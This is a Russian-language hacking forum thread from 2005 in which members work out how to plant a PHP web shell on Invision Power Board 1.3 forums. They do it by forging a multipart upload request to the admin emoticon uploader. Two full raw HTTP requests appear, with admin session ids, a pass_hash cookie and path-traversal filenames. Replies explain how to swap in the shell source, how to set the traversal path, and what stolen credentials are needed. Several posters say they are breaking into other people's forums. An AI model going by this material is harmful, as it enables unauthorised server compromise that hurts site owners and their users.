Форумы Залить шелл через подделку http запросов, на примере ipb 1.3

Discussion in 'Уязвимости CMS/форумов' started by SURRENDER, 15 Mar 2005.

  1. SURRENDER

    SURRENDER New Member

    Joined:
    1 Dec 2004
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Вот Я дошёл до того момента где нужно залить шелл :) прав на папке со смайлами конечно же не оказалось...

    POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
    Accept-Language: ru
    Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 677
    Pragma: no-cache
    Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="adsess"

    7456d367b18da87d161f59424a4e96f7
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="code"

    emo_upload
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="act"

    op
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"

    10000000000
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
    Content-Type: application/octet-stream

    <% echo("Hello from injected PHP script") %>
    -----------------------------7d43942c405bc--

    Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? :confused:
     
  2. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    А если у тебя хэш cf20fc37b4g0be45c1336f29d444e798 и id то разве нельзя потделать куки вместо http запроса? и зайти админом ? :) Или я что то путаю?
     
  3. SURRENDER

    SURRENDER New Member

    Joined:
    1 Dec 2004
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Да это само собой, Я уже в админке, но мне не форум нужен :)
     
  4. mikrobx

    mikrobx New Member

    Joined:
    11 Feb 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    да я тоже взламываю форум и хочу болше как залит шелл ???????
     
  5. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    аа.. всё торможу как всегда =) Да. Меня тоже вопрос волнует этот. Где пареметры на локальный адрес.. :confused:
     
    #5 (-=util=-), 15 Mar 2005
    Last edited: 15 Mar 2005
  6. SURRENDER

    SURRENDER New Member

    Joined:
    1 Dec 2004
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Algol, пожалуйста, обрати внимание! =\
     
  7. White Jordan

    White Jordan Guest

    Reputations:
    0
    Ну просто много LOL!!!!!!!

    Ага щас он вам поможет!!!! LOL!!!!!!! :D :D :D :D :D :D :D :D
     
    #7 White Jordan, 17 Mar 2005
    Last edited by a moderator: 17 Mar 2005
  8. SURRENDER

    SURRENDER New Member

    Joined:
    1 Dec 2004
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Ну он же эту статью писал (про ipb1.3) он должен знать...
     
  9. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    ну что никто неотвечает? Вообще последнее время что то нету активного народа не форуме....
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Какой еще файл?? Вся отсылаемая на сервер информация УЖЕ содержится в HTTP-пакете.
    А вот это
    PHP:
    <% echo("Hello from injected PHP script") %>
    и есть сам скрипт, который ты заливаешь. Вместо приведенного, тебе естественно, нужно вставить текст шелла.
     
  11. link

    link New Member

    Joined:
    15 Jan 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Рзве текст шела влезет в инеткряк?
     
  12. link

    link New Member

    Joined:
    15 Jan 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.
     
  13. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Свободно...
     
  14. XJIOP

    XJIOP Elder - Старейшина

    Joined:
    23 Mar 2005
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?
     
  15. XJIOP

    XJIOP Elder - Старейшина

    Joined:
    23 Mar 2005
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    с этим скриптом выдает ошибку

    id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE-->

    прально ли я понял?

    POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo
    Accept-Language: ru
    Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 677
    Pragma: no-cache
    Cookie: member_id=ид админа;
    pass_hash=тут понято;

    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="adsess"

    ид сесия?
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="code"

    emo_upload
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="act"

    op
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"

    10000000000
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php"
    Content-Type: application/octet-stream

    нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)?
     
  16. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    мдя =)
    Этот путь указан неверно.
    ../../forum/uploads/lol.php

    ../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой)
    допустим www.lol.ru/dir1/dir2/dir3/admin.php
    находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file
    чтобы в dir1 то ../../../upload_file
    Вот так если я нечего непутаю.

    Второе у тебя нехватает самого аплоада

    <% echo("php script") %>
    -----------------------------7d43942c405bc--
     
  17. BlackPrince

    BlackPrince Elder - Старейшина

    Joined:
    13 Oct 2004
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?
     
  18. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
     
  19. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Нет, расшифрованный админский пароль все равно нужен. Иначе ты adsess не узнаешь
     
  20. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    ну ептель тогда нет смысла париться с этими паками :\